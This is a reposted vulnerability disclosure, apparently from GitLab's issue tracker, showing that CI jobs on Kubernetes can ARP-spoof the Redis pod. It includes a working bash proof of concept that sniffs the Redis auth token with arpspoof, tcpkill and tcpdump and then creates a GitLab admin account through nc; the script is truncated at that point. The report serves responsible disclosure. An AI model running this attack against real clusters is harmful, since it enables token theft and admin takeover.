BerandaComputers and TechnologyArpspoof vs. Kubernetes

Arpspoof vs. Kubernetes

Original issue at GitLab

Summary

The Kubernetes Executor executes jobs on pods with the default security context, which allows CAP_NET_RAW. This allows for malicious workloads to use arpspoofing and other methods to attack any other workload running on the same node.

As a proof of content, the default installation of the GitLab Helm chart bundles GitLab runner and deploys the Runner into the same cluster alongside the GitLab instance. This opens various attack paths from CI Jobs towards the GitLab instance, including the ability to get admin control over the instance.

Steps to reproduce

A very basic example would be the following shell script:

#!/bin/bash
apt-get update
apt-get install -y git python python-scapy tcpdump dnsutils dsniff nmap psmisc arping binutils grep netcat
GWIP=`ip route |grep default | cut -f 3 -d " "`
REDISIP=`host gitlab-redis-master-0.gitlab-redis-headless.default.svc.cluster.local | cut -f 4 -d " "`
arping gitlab-redis-master-0.gitlab-redis-headless.default.svc.cluster.local -c 3 || exit  # wrong subnet
tcpdump -ni eth0 -s 0 -w out.pcap &
arpspoof -r -t $REDISIP $GWIP & > /dev/null 2>&1 
sleep 3
tcpkill -9 port 6379 & sleep 5 && killall -9 tcpkill
sleep 10 
killall tcpdump
killall -9 arpspoof
REDISTOKEN=`strings out.pcap |grep '^auth$' -A 1  | grep '[a-zA-Z0-9]{64}' | head -n 1`
nc $REDISIP 6379 <

The script will interfere with the redis instance on network level using arpspoof and tcpkill to sniff the redis authentication token. Subsequently the script will create an admin account via injection of a GitlabShellWorker job.

I could run this script and sucessfully create the admin account from a CI job in a test installation of the GitLab Helm chart. The installation was performed using

helm  upgrade --install gitlab  gitlab/gitlab                                      
  --timeout 600s 
--set global.hosts.domain=k8s.thetanuki.io 
--set certmanager-issuer.email=jschneeweisz@gitlab.com 
--set global.hosts.externalIP=34.107.49.76

Note: Due to the network segmentation the CI job needed to be started several times to eventually end up in the same network segment where the redis pod lives this is required for the ARP spoofing attack to be performed.

This is just one of many possible attacks, other vectors might target the Gitaly or Gitlab Shell tokens or even sniff passwords for the Web login.

Read More

Berita sebelumyaIs this Mahler? This sounds like Mahler
Berita berikutnyaTetris
RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Most Popular

Recent Comments